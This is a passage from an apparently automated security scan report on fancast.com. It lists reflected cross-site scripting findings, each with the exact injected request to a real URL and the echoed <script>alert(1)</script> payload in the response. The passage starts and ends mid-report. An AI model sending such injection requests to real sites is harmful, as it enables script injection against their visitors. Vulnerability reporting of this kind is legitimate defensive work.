Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a481c"><script>alert(1)</script>361134a11a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a481c\"><script>alert(1)</script>361134a11a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/?a481c"><script>alert(1)</script>361134a11a6=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:10 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:10 GMT
Content-Length: 39586

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>What To Watch: Weekend | Fancast
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/?a481c\"><script>alert(1)</script>361134a11a6=1"/>
...[SNIP]...

2.450. http://www.fancast.com/blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64d7b"><script>alert(1)</script>e0d7ae58bf was submitted in the REST URL parameter 3. This input was echoed as 64d7b\"><script>alert(1)</script>e0d7ae58bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-news64d7b"><script>alert(1)</script>e0d7ae58bf/bachelor-brad-womack-there-is-a-very-happy-ending/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:52 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:52 GMT
Content-Length: 43943

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'Bachelor' Brad Womack: 'There I
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news64d7b\"><script>alert(1)</script>e0d7ae58bf/bachelor-brad-womack-there-is-a-very-happy-ending/"/>
...[SNIP]...

2.451. http://www.fancast.com/blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 975db</script><script>alert(1)</script>4de78dbee15 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news975db</script><script>alert(1)</script>4de78dbee15/bachelor-brad-womack-there-is-a-very-happy-ending/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:55 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:55 GMT
Content-Length: 43978

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'Bachelor' Brad Womack: 'There I
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news975db</script><script>alert(1)</script>4de78dbee15/bachelor-brad-womack-there-is-a-very-happy-ending/&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style
...[SNIP]...

2.452. http://www.fancast.com/blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ac1d"><script>alert(1)</script>e52a7dfad6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4ac1d\"><script>alert(1)</script>e52a7dfad6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/?4ac1d"><script>alert(1)</script>e52a7dfad6f=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:46 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:46 GMT
Content-Length: 43963

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'Bachelor' Brad Womack: 'There I
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/?4ac1d\"><script>alert(1)</script>e52a7dfad6f=1"/>
...[SNIP]...

2.453. http://www.fancast.com/blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73787</script><script>alert(1)</script>5d9f98c4b46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/?73787</script><script>alert(1)</script>5d9f98c4b46=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:51 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:50 GMT
Content-Length: 43993

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'Bachelor' Brad Womack: 'There I
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/?73787</script><script>alert(1)</script>5d9f98c4b46=1&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:120px; heig
...[SNIP]...

2.454. http://www.fancast.com/blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15b1b</script><script>alert(1)</script>f1f02f11dc8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news15b1b</script><script>alert(1)</script>f1f02f11dc8/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:55 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:54 GMT
Content-Length: 38731

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'Dexter's Julia Stiles: I Didn't
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news15b1b</script><script>alert(1)</script>f1f02f11dc8/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparenc
...[SNIP]...

2.455. http://www.fancast.com/blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c996"><script>alert(1)</script>ede090263f2 was submitted in the REST URL parameter 3. This input was echoed as 8c996\"><script>alert(1)</script>ede090263f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-news8c996"><script>alert(1)</script>ede090263f2/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:51 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:51 GMT
Content-Length: 38701

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'Dexter's Julia Stiles: I Didn't
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news8c996\"><script>alert(1)</script>ede090263f2/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/"/>
...[SNIP]...

2.456. http://www.fancast.com/blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 191b3</script><script>alert(1)</script>aa6d4223d87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/?191b3</script><script>alert(1)</script>aa6d4223d87=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:50 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:50 GMT
Content-Length: 38746

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'Dexter's Julia Stiles: I Didn't
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/?191b3</script><script>alert(1)</script>aa6d4223d87=1&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:120px; heig
...[SNIP]...

2.457. http://www.fancast.com/blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 668d1"><script>alert(1)</script>252dfa3392b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 668d1\"><script>alert(1)</script>252dfa3392b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/?668d1"><script>alert(1)</script>252dfa3392b=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:46 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:46 GMT
Content-Length: 38716

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'Dexter's Julia Stiles: I Didn't
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/?668d1\"><script>alert(1)</script>252dfa3392b=1"/>
...[SNIP]...

2.458. http://www.fancast.com/blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2556c"><script>alert(1)</script>504c36f7f5e was submitted in the REST URL parameter 3. This input was echoed as 2556c\"><script>alert(1)</script>504c36f7f5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-news2556c"><script>alert(1)</script>504c36f7f5e/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:52 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:51 GMT
Content-Length: 39733

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Good-bye to Larry King: We'll Mi
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news2556c\"><script>alert(1)</script>504c36f7f5e/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/"/>
...[SNIP]...

2.459. http://www.fancast.com/blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f4ed</script><script>alert(1)</script>7858e663d33 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news6f4ed</script><script>alert(1)</script>7858e663d33/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:55 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:55 GMT
Content-Length: 39763

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Good-bye to Larry King: We'll Mi
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news6f4ed</script><script>alert(1)</script>7858e663d33/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTranspar
...[SNIP]...

2.460. http://www.fancast.com/blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8833b</script><script>alert(1)</script>27e43f2b7ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/?8833b</script><script>alert(1)</script>27e43f2b7ab=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:51 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:50 GMT
Content-Length: 39778

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Good-bye to Larry King: We'll Mi
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/?8833b</script><script>alert(1)</script>27e43f2b7ab=1&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:120px; heig
...[SNIP]...

2.461. http://www.fancast.com/blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc9ce"><script>alert(1)</script>2cc6ca50639 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dc9ce\"><script>alert(1)</script>2cc6ca50639 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/?dc9ce"><script>alert(1)</script>2cc6ca50639=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:19:46 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:24:46 GMT
Content-Length: 39748

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Good-bye to Larry King: We'll Mi
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/?dc9ce\"><script>alert(1)</script>2cc6ca50639=1"/>
...[SNIP]...

2.462. http://www.fancast.com/blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70cce"><script>alert(1)</script>9d2167a49b7 was submitted in the REST URL parameter 3. This input was echoed as 70cce\"><script>alert(1)</script>9d2167a49b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-news70cce"><script>alert(1)</script>9d2167a49b7/huge-ratings-for-larry-kings-finale/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:16 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:15 GMT
Content-Length: 34271

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>Huge Ratings for Larry King's Fi
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news70cce\"><script>alert(1)</script>9d2167a49b7/huge-ratings-for-larry-kings-finale/"/>
...[SNIP]...

2.463. http://www.fancast.com/blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50d2b</script><script>alert(1)</script>a46c743dd20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news50d2b</script><script>alert(1)</script>a46c743dd20/huge-ratings-for-larry-kings-finale/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:19 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:19 GMT
Content-Length: 34301

<!DOCTYPE html>
